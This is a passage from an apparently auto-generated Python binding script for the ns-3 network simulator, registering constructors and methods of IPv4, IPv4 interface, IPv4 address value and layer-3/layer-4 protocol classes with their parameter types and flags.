## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol::RxStatus ns3::IpL4Protocol::Receive(ns3::Ptr<ns3::Packet> p, ns3::Ipv6Header const & header, ns3::Ptr<ns3::Ipv6Interface> incomingInterface) [member function]
cls.add_method('Receive',
'ns3::IpL4Protocol::RxStatus',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv6Header const &', 'header'), param('ns3::Ptr< ns3::Ipv6Interface >', 'incomingInterface')],
is_pure_virtual=True, is_virtual=True)
## ip-l4-protocol.h (module 'internet'): void ns3::IpL4Protocol::ReceiveIcmp(ns3::Ipv4Address icmpSource, uint8_t icmpTtl, uint8_t icmpType, uint8_t icmpCode, uint32_t icmpInfo, ns3::Ipv4Address payloadSource, ns3::Ipv4Address payloadDestination, uint8_t const * payload) [member function]
cls.add_method('ReceiveIcmp',
'void',
[param('ns3::Ipv4Address', 'icmpSource'), param('uint8_t', 'icmpTtl'), param('uint8_t', 'icmpType'), param('uint8_t', 'icmpCode'), param('uint32_t', 'icmpInfo'), param('ns3::Ipv4Address', 'payloadSource'), param('ns3::Ipv4Address', 'payloadDestination'), param('uint8_t const *', 'payload')],
is_virtual=True)
## ip-l4-protocol.h (module 'internet'): void ns3::IpL4Protocol::ReceiveIcmp(ns3::Ipv6Address icmpSource, uint8_t icmpTtl, uint8_t icmpType, uint8_t icmpCode, uint32_t icmpInfo, ns3::Ipv6Address payloadSource, ns3::Ipv6Address payloadDestination, uint8_t const * payload) [member function]
cls.add_method('ReceiveIcmp',
'void',
[param('ns3::Ipv6Address', 'icmpSource'), param('uint8_t', 'icmpTtl'), param('uint8_t', 'icmpType'), param('uint8_t', 'icmpCode'), param('uint32_t', 'icmpInfo'), param('ns3::Ipv6Address', 'payloadSource'), param('ns3::Ipv6Address', 'payloadDestination'), param('uint8_t const *', 'payload')],
is_virtual=True)
## ip-l4-protocol.h (module 'internet'): void ns3::IpL4Protocol::SetDownTarget(ns3::Callback<void,ns3::Ptr<ns3::Packet>,ns3::Ipv4Address,ns3::Ipv4Address,unsigned char,ns3::Ptr<ns3::Ipv4Route>,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetDownTarget',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv4Address, ns3::Ipv4Address, unsigned char, ns3::Ptr< ns3::Ipv4Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## ip-l4-protocol.h (module 'internet'): void ns3::IpL4Protocol::SetDownTarget6(ns3::Callback<void,ns3::Ptr<ns3::Packet>,ns3::Ipv6Address,ns3::Ipv6Address,unsigned char,ns3::Ptr<ns3::Ipv6Route>,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetDownTarget6',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv6Address, ns3::Ipv6Address, unsigned char, ns3::Ptr< ns3::Ipv6Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3Ipv4_methods(root_module, cls):
## ipv4.h (module 'internet'): ns3::Ipv4::Ipv4(ns3::Ipv4 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4 const &', 'arg0')])
## ipv4.h (module 'internet'): ns3::Ipv4::Ipv4() [constructor]
cls.add_constructor([])
## ipv4.h (module 'internet'): bool ns3::Ipv4::AddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('AddAddress',
'bool',
[param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::AddInterface(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('AddInterface',
'uint32_t',
[param('ns3::Ptr< ns3::NetDevice >', 'device')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ptr<ns3::Socket> ns3::Ipv4::CreateRawSocket() [member function]
cls.add_method('CreateRawSocket',
'ns3::Ptr< ns3::Socket >',
[],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::DeleteRawSocket(ns3::Ptr<ns3::Socket> socket) [member function]
cls.add_method('DeleteRawSocket',
'void',
[param('ns3::Ptr< ns3::Socket >', 'socket')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4::GetAddress(uint32_t interface, uint32_t addressIndex) const [member function]
cls.add_method('GetAddress',
'ns3::Ipv4InterfaceAddress',
[param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForAddress(ns3::Ipv4Address address) const [member function]
cls.add_method('GetInterfaceForAddress',
'int32_t',
[param('ns3::Ipv4Address', 'address')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForDevice(ns3::Ptr<const ns3::NetDevice> device) const [member function]
cls.add_method('GetInterfaceForDevice',
'int32_t',
[param('ns3::Ptr< ns3::NetDevice const >', 'device')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForPrefix(ns3::Ipv4Address address, ns3::Ipv4Mask mask) const [member function]
cls.add_method('GetInterfaceForPrefix',
'int32_t',
[param('ns3::Ipv4Address', 'address'), param('ns3::Ipv4Mask', 'mask')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): uint16_t ns3::Ipv4::GetMetric(uint32_t interface) const [member function]
cls.add_method('GetMetric',
'uint16_t',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): uint16_t ns3::Ipv4::GetMtu(uint32_t interface) const [member function]
cls.add_method('GetMtu',
'uint16_t',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::GetNAddresses(uint32_t interface) const [member function]
cls.add_method('GetNAddresses',
'uint32_t',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::GetNInterfaces() const [member function]
cls.add_method('GetNInterfaces',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4::GetNetDevice(uint32_t interface) [member function]
cls.add_method('GetNetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ptr<ns3::IpL4Protocol> ns3::Ipv4::GetProtocol(int protocolNumber) const [member function]
cls.add_method('GetProtocol',
'ns3::Ptr< ns3::IpL4Protocol >',
[param('int', 'protocolNumber')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4::GetRoutingProtocol() const [member function]
cls.add_method('GetRoutingProtocol',
'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): static ns3::TypeId ns3::Ipv4::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::Insert(ns3::Ptr<ns3::IpL4Protocol> protocol) [member function]
cls.add_method('Insert',
'void',
[param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::IsDestinationAddress(ns3::Ipv4Address address, uint32_t iif) const [member function]
cls.add_method('IsDestinationAddress',
'bool',
[param('ns3::Ipv4Address', 'address'), param('uint32_t', 'iif')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::IsForwarding(uint32_t interface) const [member function]
cls.add_method('IsForwarding',
'bool',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::IsUp(uint32_t interface) const [member function]
cls.add_method('IsUp',
'bool',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::RemoveAddress(uint32_t interface, uint32_t addressIndex) [member function]
cls.add_method('RemoveAddress',
'bool',
[param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::RemoveAddress(uint32_t interface, ns3::Ipv4Address address) [member function]
cls.add_method('RemoveAddress',
'bool',
[param('uint32_t', 'interface'), param('ns3::Ipv4Address', 'address')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4::SelectSourceAddress(ns3::Ptr<const ns3::NetDevice> device, ns3::Ipv4Address dst, ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function]
cls.add_method('SelectSourceAddress',
'ns3::Ipv4Address',
[param('ns3::Ptr< ns3::NetDevice const >', 'device'), param('ns3::Ipv4Address', 'dst'), param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::Send(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Address source, ns3::Ipv4Address destination, uint8_t protocol, ns3::Ptr<ns3::Ipv4Route> route) [member function]
cls.add_method('Send',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Address', 'source'), param('ns3::Ipv4Address', 'destination'), param('uint8_t', 'protocol'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SendWithHeader(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Header ipHeader, ns3::Ptr<ns3::Ipv4Route> route) [member function]
cls.add_method('SendWithHeader',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Header', 'ipHeader'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetDown(uint32_t interface) [member function]
cls.add_method('SetDown',
'void',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetForwarding(uint32_t interface, bool val) [member function]
cls.add_method('SetForwarding',
'void',
[param('uint32_t', 'interface'), param('bool', 'val')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetMetric(uint32_t interface, uint16_t metric) [member function]
cls.add_method('SetMetric',
'void',
[param('uint32_t', 'interface'), param('uint16_t', 'metric')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol) [member function]
cls.add_method('SetRoutingProtocol',
'void',
[param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetUp(uint32_t interface) [member function]
cls.add_method('SetUp',
'void',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ipv4::IF_ANY [variable]
cls.add_static_attribute('IF_ANY', 'uint32_t const', is_const=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::GetIpForward() const [member function]
cls.add_method('GetIpForward',
'bool',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::GetWeakEsModel() const [member function]
cls.add_method('GetWeakEsModel',
'bool',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetIpForward(bool forward) [member function]
cls.add_method('SetIpForward',
'void',
[param('bool', 'forward')],
is_pure_virtual=True, visibility='private', is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetWeakEsModel(bool model) [member function]
cls.add_method('SetWeakEsModel',
'void',
[param('bool', 'model')],
is_pure_virtual=True, visibility='private', is_virtual=True)
return
def register_Ns3Ipv4AddressChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv4AddressValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Address const &', 'value')])
return
def register_Ns3Ipv4Interface_methods(root_module, cls):
## ipv4-interface.h (module 'internet'): ns3::Ipv4Interface::Ipv4Interface(ns3::Ipv4Interface const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Interface const &', 'arg0')])
## ipv4-interface.h (module 'internet'): ns3::Ipv4Interface::Ipv4Interface() [constructor]
cls.add_constructor([])
## ipv4-interface.h (module 'internet'): bool ns3::Ipv4Interface::AddAddress(ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('AddAddress',
'bool',
[param('ns3::Ipv4InterfaceAddress', 'address')])
## ipv4-interface.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4Interface::GetAddress(uint32_t index) const [member function]
cls.add_method('GetAddress',
'ns3::Ipv4InterfaceAddress',
[param('uint32_t', 'index')],
is_const=True)
## ipv4-interface.h (module 'internet'): ns3::Ptr<ns3::ArpCache> ns3::Ipv4Interface::GetArpCache() const [member function]
cls.add_method('GetArpCache',
'ns3::Ptr< ns3::ArpCache >',
[],
is_const=True)
## ipv4-interface.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4Interface::GetDevice() const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[],
is_const=True)
## ipv4-interface.h (module 'internet'): uint16_t ns3::Ipv4Interface::GetMetric() const [member function]
cls.add_method('GetMetric',
'uint16_t',
[],
is_const=True)
## ipv4-interface.h (module 'internet'): uint32_t ns3::Ipv4Interface::GetNAddresses() const [member function]
cls.add_method('GetNAddresses',
'uint32_t',
[],
is_const=True)
## ipv4-interface.h (module 'internet'): static ns3::TypeId ns3::Ipv4Interface::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4-interface.h (module 'internet'): bool ns3::Ipv4Interface::IsDown() const [member function]
cls.add_method('IsDown',
'bool',
[],
is_const=True)
## ipv4-interface.h (module 'internet'): bool ns3::Ipv4Interface::IsForwarding() const [member function]
cls.add_method('IsForwarding',
'bool',
[],
is_const=True)
## ipv4-interface.h (module 'internet'): bool ns3::Ipv4Interface::IsUp() const [member function]
cls.add_method('IsUp',
'bool',
[],
is_const=True)
## ipv4-interface.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4Interface::RemoveAddress(uint32_t index) [member function]
cls.add_method('RemoveAddress',
'ns3::Ipv4InterfaceAddress',
[param('uint32_t', 'index')])
## ipv4-interface.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4Interface::RemoveAddress(ns3::Ipv4Address address) [member function]
cls.add_method('RemoveAddress',
'ns3::Ipv4InterfaceAddress',
[param('ns3::Ipv4Address', 'address')])
## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::Send(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Address dest) [member function]
cls.add_method('Send',
'void',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Address', 'dest')])
## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetArpCache(ns3::Ptr<ns3::ArpCache> arg0) [member function]
cls.add_method('SetArpCache',
'void',
[param('ns3::Ptr< ns3::ArpCache >', 'arg0')])
## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('SetDevice',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetDown() [member function]
cls.add_method('SetDown',
'void',
[])
## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetForwarding(bool val) [member function]
cls.add_method('SetForwarding',
'void',
[param('bool', 'val')])
## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetMetric(uint16_t metric) [member function]
cls.add_method('SetMetric',
'void',
[param('uint16_t', 'metric')])
## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetUp() [member function]
cls.add_method('SetUp',
'void',
[])
## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3Ipv4L3Protocol_methods(root_module, cls):
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol::Ipv4L3Protocol() [constructor]
cls.add_constructor([])
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::AddAddress(uint32_t i, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('AddAddress',
'bool',
[param('uint32_t', 'i'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): uint32_t ns3::Ipv4L3Protocol::AddInterface(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('AddInterface',
'uint32_t',
[param('ns3::Ptr< ns3::NetDevice >', 'device')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::Socket> ns3::Ipv4L3Protocol::CreateRawSocket() [member function]
cls.add_method('CreateRawSocket',
'ns3::Ptr< ns3::Socket >',
[],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::DeleteRawSocket(ns3::Ptr<ns3::Socket> socket) [member function]
cls.add_method('DeleteRawSocket',
'void',
[param('ns3::Ptr< ns3::Socket >', 'socket')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4L3Protocol::GetAddress(uint32_t interfaceIndex, uint32_t addressIndex) const [member function]
cls.add_method('GetAddress',
'ns3::Ipv4InterfaceAddress',
[param('uint32_t', 'interfaceIndex'), param('uint32_t', 'addressIndex')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4Interface> ns3::Ipv4L3Protocol::GetInterface(uint32_t i) const [member function]
cls.add_method('GetInterface',
'ns3::Ptr< ns3::Ipv4Interface >',
[param('uint32_t', 'i')],
is_const=True)
## ipv4-l3-protocol.h (module 'internet'): int32_t ns3::Ipv4L3Protocol::GetInterfaceForAddress(ns3::Ipv4Address addr) const [member function]
cls.add_method('GetInterfaceForAddress',
'int32_t',
[param('ns3::Ipv4Address', 'addr')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): int32_t ns3::Ipv4L3Protocol::GetInterfaceForDevice(ns3::Ptr<const ns3::NetDevice> device) const [member function]
cls.add_method('GetInterfaceForDevice',
'int32_t',
[param('ns3::Ptr< ns3::NetDevice const >', 'device')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): int32_t ns3::Ipv4L3Protocol::GetInterfaceForPrefix(ns3::Ipv4Address addr, ns3::Ipv4Mask mask) const [member function]
cls.add_method('GetInterfaceForPrefix',
'int32_t',
[param('ns3::Ipv4Address', 'addr'), param('ns3::Ipv4Mask', 'mask')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): uint16_t ns3::Ipv4L3Protocol::GetMetric(uint32_t i) const [member function]
cls.add_method('GetMetric',
'uint16_t',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): uint16_t ns3::Ipv4L3Protocol::GetMtu(uint32_t i) const [member function]
cls.add_method('GetMtu',
'uint16_t',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): uint32_t ns3::Ipv4L3Protocol::GetNAddresses(uint32_t interface) const [member function]
cls.add_method('GetNAddresses',
'uint32_t',
[param('uint32_t', 'interface')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): uint32_t ns3::Ipv4L3Protocol::GetNInterfaces() const [member function]
cls.add_method('GetNInterfaces',
'uint32_t',
[],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4L3Protocol::GetNetDevice(uint32_t i) [member function]
cls.add_method('GetNetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::IpL4Protocol> ns3::Ipv4L3Protocol::GetProtocol(int protocolNumber) const [member function]
cls.add_method('GetProtocol',
'ns3::Ptr< ns3::IpL4Protocol >',
[param('int', 'protocolNumber')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4L3Protocol::GetRoutingProtocol() const [member function]
cls.add_method('GetRoutingProtocol',
'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
[],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): static ns3::TypeId ns3::Ipv4L3Protocol::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Insert(ns3::Ptr<ns3::IpL4Protocol> protocol) [member function]
cls.add_method('Insert',
'void',
[param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::IsDestinationAddress(ns3::Ipv4Address address, uint32_t iif) const [member function]
cls.add_method('IsDestinationAddress',
'bool',
[param('ns3::Ipv4Address', 'address'), param('uint32_t', 'iif')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::IsForwarding(uint32_t i) const [member function]
cls.add_method('IsForwarding',
'bool',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::IsUp(uint32_t i) const [member function]
cls.add_method('IsUp',
'bool',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Receive(ns3::Ptr<ns3::NetDevice> device, ns3::Ptr<ns3::Packet const> p, uint16_t protocol, ns3::Address const & from, ns3::Address const & to, ns3::NetDevice::PacketType packetType) [member function]
cls.add_method('Receive',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'device'), param('ns3::Ptr< ns3::Packet const >', 'p'), param('uint16_t', 'protocol'), param('ns3::Address const &', 'from'), param('ns3::Address const &', 'to'), param('ns3::NetDevice::PacketType', 'packetType')])
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Remove(ns3::Ptr<ns3::IpL4Protocol> protocol) [member function]
cls.add_method('Remove',
'void',
[param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol')])
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::RemoveAddress(uint32_t interfaceIndex, uint32_t addressIndex) [member function]
cls.add_method('RemoveAddress',
'bool',
[param('uint32_t', 'interfaceIndex'), param('uint32_t', 'addressIndex')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::RemoveAddress(uint32_t interface, ns3::Ipv4Address address) [member function]
cls.add_method('RemoveAddress',
'bool',
[param('uint32_t', 'interface'), param('ns3::Ipv4Address', 'address')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4L3Protocol::SelectSourceAddress(ns3::Ptr<const ns3::NetDevice> device, ns3::Ipv4Address dst, ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function]
cls.add_method('SelectSourceAddress',
'ns3::Ipv4Address',
[param('ns3::Ptr< ns3::NetDevice const >', 'device'), param('ns3::Ipv4Address', 'dst'), param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Send(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Address source, ns3::Ipv4Address destination, uint8_t protocol, ns3::Ptr<ns3::Ipv4Route> route) [member function]
cls.add_method('Send',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Address', 'source'), param('ns3::Ipv4Address', 'destination'), param('uint8_t', 'protocol'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SendWithHeader(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Header ipHeader, ns3::Ptr<ns3::Ipv4Route> route) [member function]
cls.add_method('SendWithHeader',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Header', 'ipHeader'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetDefaultTtl(uint8_t ttl) [member function]
cls.add_method('SetDefaultTtl',
'void',
[param('uint8_t', 'ttl')])
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetDown(uint32_t i) [member function]
cls.add_method('SetDown',
'void',
[param('uint32_t', 'i')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetForwarding(uint32_t i, bool val) [member function]
cls.add_method('SetForwarding',
'void',
[param('uint32_t', 'i'), param('bool', 'val')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetMetric(uint32_t i, uint16_t metric) [member function]
cls.add_method('SetMetric',
'void',
[param('uint32_t', 'i'), param('uint16_t', 'metric')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol) [member function]
cls.add_method('SetRoutingProtocol',
'void',
[param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetUp(uint32_t i) [member function]
cls.add_method('SetUp',
'void',
[param('uint32_t', 'i')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol::PROT_NUMBER [variable]
cls.add_static_attribute('PROT_NUMBER', 'uint16_t const', is_const=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
